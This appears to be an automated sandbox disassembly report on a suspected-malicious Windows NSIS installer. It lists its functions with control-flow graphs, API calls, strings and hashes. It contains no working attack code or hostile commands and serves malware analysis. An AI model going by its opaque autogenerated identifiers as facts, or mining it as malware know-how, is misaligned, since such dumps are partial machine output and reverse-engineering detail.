                                                                                                            • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                            • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                            • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                                                                            Function 00402F30 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 203memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 445 4031cf-4031d3 443->445 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 460 403187-40318c 452->460 461 4030bc-4030bf 452->461 454 402fd7 453->454 455 402fd9-402fe6 call 403447 453->455 454->455 462 403143-40314b call 402e8e 455->462 463 402fec-402ff2 455->463 460->445 464 4030c1-4030d9 call 40345d call 403447 461->464 465 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 461->465 462->460 467 403072-403076 463->467 468 402ff4-40300c call 405e99 463->468 464->460 488 4030df-4030e5 464->488 491 403139-40313e 465->491 492 40314d-40317d call 40345d call 4031d6 465->492 472 403078-40307e call 402e8e 467->472 473 40307f-403085 467->473 468->473 486 40300e-403015 468->486 472->473 479 403087-403095 call 4068b5 473->479 480 403098-4030a2 473->480 479->480 480->452 480->453 486->473 490 403017-40301e 486->490 488->460 488->465 490->473 493 403020-403027 490->493 491->445 499 403182-403185 492->499 493->473 496 403029-403030 493->496 496->473 498 403032-403052 496->498 498->460 500 403058-40305c 498->500 499->460 501 40318e-40319f 499->501 502 403064-40306c 500->502 503 40305e-403062 500->503 505 4031a1 501->505 506 4031a7-4031ac 501->506 502->473 504 40306e-403070 502->504 503->452 503->502 504->473 505->506 507 4031ad-4031b3 506->507 507->507 508 4031b5-4031cd call 405e99 507->508 508->445
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rXKfKM0T49.exe,00000400), ref: 00402F60
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\rXKfKM0T49.exe,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\rXKfKM0T49.exe,C:\Users\user\Desktop\rXKfKM0T49.exe,80000000,00000003), ref: 00402FA9
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\rXKfKM0T49.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 2803837635-3422350778
                                                                                                            • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                            • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                            • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                            • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                            Function 0040640A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 724 40640a-406415 725 406417-406426 724->725 726 406428-40643e 724->726 725->726 727 406444-406451 726->727 728 406656-40665c 726->728 727->728 729 406457-40645e 727->729 730 406662-40666d 728->730 731 406463-406470 728->731 729->728 733 406678-406679 730->733 734 40666f-406673 call 4063e8 730->734 731->730 732 406476-406482 731->732 735 406643 732->735 736 406488-4064c6 732->736 734->733 740 406651-406654 735->740 741 406645-40664f 735->741 738 4065e6-4065ea 736->738 739 4064cc-4064d7 736->739 744 4065ec-4065f2 738->744 745 40661d-406621 738->745 742 4064f0 739->742 743 4064d9-4064de 739->743 740->728 741->728 751 4064f7-4064fe 742->751 743->742 748 4064e0-4064e3 743->748 749 406602-40660e call 4063e8 744->749 750 4065f4-406600 call 40632f 744->750 746 406630-406641 lstrlenW 745->746 747 406623-40662b call 40640a 745->747 746->728 747->746 748->742 753 4064e5-4064e8 748->753 762 406613-406619 749->762 750->762 755 406500-406502 751->755 756 406503-406505 751->756 753->742 758 4064ea-4064ee 753->758 755->756 760 406540-406543 756->760 761 406507-40652e call 4062b6 756->761 758->751 764 406553-406556 760->764 765 406545-406551 GetSystemDirectoryW 760->765 772 406534-40653b call 40640a 761->772 773 4065ce-4065d1 761->773 762->746 763 40661b 762->763 768 4065de-4065e4 call 40667c 763->768 770 4065c1-4065c3 764->770 771 406558-406566 GetWindowsDirectoryW 764->771 769 4065c5-4065c9 765->769 768->746 769->768 775 4065cb 769->775 770->769 774 406568-406572 770->774 771->770 772->769 773->768 778 4065d3-4065d9 lstrcatW 773->778 780 406574-406577 774->780 781 40658c-4065a2 SHGetSpecialFolderLocation 774->781 775->773 778->768 780->781 783 406579-406580 780->783 784 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 781->784 785 4065bd 781->785 786 406588-40658a 783->786 784->769 784->785 785->770 786->769 786->781
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                            • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 717251189-1230650788
                                                                                                            • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                            • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                            • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                            • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                                                                            Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 851 40176f-401794 call 402c41 call 405d34 856 401796-40179c call 4063e8 851->856 857 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 851->857 862 4017b5-4017b6 call 40667c 856->862 857->862 866 4017bb-4017bf 862->866 867 4017c1-4017cb call 40672b 866->867 868 4017f2-4017f5 866->868 875 4017dd-4017ef 867->875 876 4017cd-4017db CompareFileTime 867->876 870 4017f7-4017f8 call 405eb9 868->870 871 4017fd-401819 call 405ede 868->871 870->871 878 40181b-40181e 871->878 879 40188d-4018b6 call 405450 call 4031d6 871->879 875->868 876->875 880 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 878->880 881 40186f-401879 call 405450 878->881 893 4018b8-4018bc 879->893 894 4018be-4018ca SetFileTime 879->894 880->866 914 401864-401865 880->914 891 401882-401888 881->891 895 402ace 891->895 893->894 897 4018d0-4018db CloseHandle 893->897 894->897 898 402ad0-402ad4 895->898 900 4018e1-4018e4 897->900 901 402ac5-402ac8 897->901 903 4018e6-4018f7 call 40640a lstrcatW 900->903 904 4018f9-4018fc call 40640a 900->904 901->895 908 401901-4022fc call 405a4e 903->908 904->908 908->898 914->891 916 401867-401868 914->916 916->881
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,Call,00436000,?,?,00000031), ref: 004017B0
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nspC239.tmp$C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dll$Call
                                                                                                            • API String ID: 1941528284-3205120422
                                                                                                            • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                            • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                            • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                            • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                            Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 917 40264a-402663 call 402c1f 920 402ac5-402ac8 917->920 921 402669-402670 917->921 922 402ace-402ad4 920->922 923 402672 921->923 924 402675-402678 921->924 923->924 926 4027dc-4027e4 924->926 927 40267e-40268d call 406348 924->927 926->920 927->926 930 402693 927->930 931 402699-40269d 930->931 932 402732-402735 931->932 933 4026a3-4026be ReadFile 931->933 935 402737-40273a 932->935 936 40274d-40275d call 405f61 932->936 933->926 934 4026c4-4026c9 933->934 934->926 938 4026cf-4026dd 934->938 935->936 939 40273c-402747 call 405fbf 935->939 936->926 944 40275f 936->944 941 4026e3-4026f5 MultiByteToWideChar 938->941 942 402798-4027a4 call 40632f 938->942 939->926 939->936 941->944 945 4026f7-4026fa 941->945 942->922 948 402762-402765 944->948 949 4026fc-402707 945->949 948->942 951 402767-40276c 948->951 949->948 952 402709-40272e SetFilePointer MultiByteToWideChar 949->952 953 4027a9-4027ad 951->953 954 40276e-402773 951->954 952->949 955 402730 952->955 957 4027ca-4027d6 SetFilePointer 953->957 958 4027af-4027b3 953->958 954->953 956 402775-402788 954->956 955->944 956->926 959 40278a-402790 956->959 957->926 960 4027b5-4027b9 958->960 961 4027bb-4027c8 958->961 959->931 962 402796 959->962 960->957 960->961 961->926 962->926
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                                                              • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405FD5
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 163830602-2366072709
                                                                                                            • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                            • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                            • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                            • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                            Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 963 406752-406772 GetSystemDirectoryW 964 406774 963->964 965 406776-406778 963->965 964->965 966 406789-40678b 965->966 967 40677a-406783 965->967 969 40678c-4067bf wsprintfW LoadLibraryExW 966->969 967->966 968 406785-406787 967->968 968->969
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                            • wsprintfW.USER32 ref: 004067A4
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                            • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                            • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                            Function 70091777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 970 70091777-700917b6 call 70091b5f 974 700917bc-700917c0 970->974 975 700918d6-700918d8 970->975 976 700917c9-700917d6 call 70092394 974->976 977 700917c2-700917c8 call 70092352 974->977 982 700917d8-700917dd 976->982 983 70091806-7009180d 976->983 977->976 986 700917f8-700917fb 982->986 987 700917df-700917e0 982->987 984 7009182d-70091831 983->984 985 7009180f-7009182b call 70092569 call 700915b4 call 70091272 GlobalFree 983->985 988 7009187e-70091884 call 70092569 984->988 989 70091833-7009187c call 700915c6 call 70092569 984->989 1011 70091885-70091889 985->1011 986->983 990 700917fd-700917fe call 70092d37 986->990 992 700917e8-700917e9 call 70092aac 987->992 993 700917e2-700917e3 987->993 988->1011 989->1011 1005 70091803 990->1005 1002 700917ee 992->1002 994 700917f0-700917f6 call 70092724 993->994 995 700917e5-700917e6 993->995 1010 70091805 994->1010 995->983 995->992 1002->1005 1005->1010 1010->983 1014 7009188b-70091899 call 7009252c 1011->1014 1015 700918c6-700918cd 1011->1015 1020 7009189b-7009189e 1014->1020 1021 700918b1-700918b8 1014->1021 1015->975 1017 700918cf-700918d0 GlobalFree 1015->1017 1017->975 1020->1021 1022 700918a0-700918a8 1020->1022 1021->1015 1023 700918ba-700918c5 call 7009153d 1021->1023 1022->1021 1024 700918aa-700918ab FreeLibrary 1022->1024 1023->1015 1024->1021
                                                                                                            APIs
                                                                                                              • Part of subcall function 70091B5F: GlobalFree.KERNEL32(?), ref: 70091DB2
                                                                                                              • Part of subcall function 70091B5F: GlobalFree.KERNEL32(?), ref: 70091DB7
                                                                                                              • Part of subcall function 70091B5F: GlobalFree.KERNEL32(?), ref: 70091DBC
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70091825
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 700918AB
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 700918D0
                                                                                                              • Part of subcall function 70092352: GlobalAlloc.KERNEL32(00000040,?), ref: 70092383
                                                                                                              • Part of subcall function 70092724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,700917F6,00000000), ref: 700927F4
                                                                                                              • Part of subcall function 700915C6: wsprintfW.USER32 ref: 700915F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3962662361-3916222277
                                                                                                            • Opcode ID: ec6f555e9f43647bfe7486438c51c0355eab11d753c6178c004ea0b9b7ea0270
                                                                                                            • Instruction ID: fd57513ab98fdb66aeb8243f975e1869204649417d479dcde3e4b7445d049bde
                                                                                                            • Opcode Fuzzy Hash: ec6f555e9f43647bfe7486438c51c0355eab11d753c6178c004ea0b9b7ea0270
                                                                                                            • Instruction Fuzzy Hash: A34101726202049EDB108F70DC84BCE37FDBB04B30F514069F907AA286DBB89484F7A8
                                                                                                            Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1027 4023e4-402415 call 402c41 * 2 call 402cd1 1034 402ac5-402ad4 1027->1034 1035 40241b-402425 1027->1035 1037 402427-402434 call 402c41 lstrlenW 1035->1037 1038 402438-40243b 1035->1038 1037->1038 1041 40243d-40244e call 402c1f 1038->1041 1042 40244f-402452 1038->1042 1041->1042 1044 402463-402477 RegSetValueExW 1042->1044 1045 402454-40245e call 4031d6 1042->1045 1049 402479 1044->1049 1050 40247c-40255d RegCloseKey 1044->1050 1045->1044 1049->1050 1050->1034 1052 40288b-402892 1050->1052 1052->1034
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nspC239.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nspC239.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nspC239.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseValuelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nspC239.tmp
                                                                                                            • API String ID: 2655323295-4078068100
                                                                                                            • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                            • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                                            • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                            • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68
                                                                                                            Function 00405F0D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1053 405f0d-405f19 1054 405f1a-405f4e GetTickCount GetTempFileNameW 1053->1054 1055 405f50-405f52 1054->1055 1056 405f5d-405f5f 1054->1056 1055->1054 1057 405f54 1055->1057 1058 405f57-405f5a 1056->1058 1057->1058
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF), ref: 00405F46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
